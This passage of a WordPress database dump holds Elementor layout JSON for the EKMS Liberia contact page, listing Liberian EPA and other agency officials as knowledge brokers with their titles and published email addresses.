id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(15972,2415,'_elementor_edit_mode','builder'),(15973,2415,'_elementor_template_type','wp-page'),(15974,2415,'_elementor_version','2.7.5'),(15975,2415,'_wp_page_template','default'),(15976,2415,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\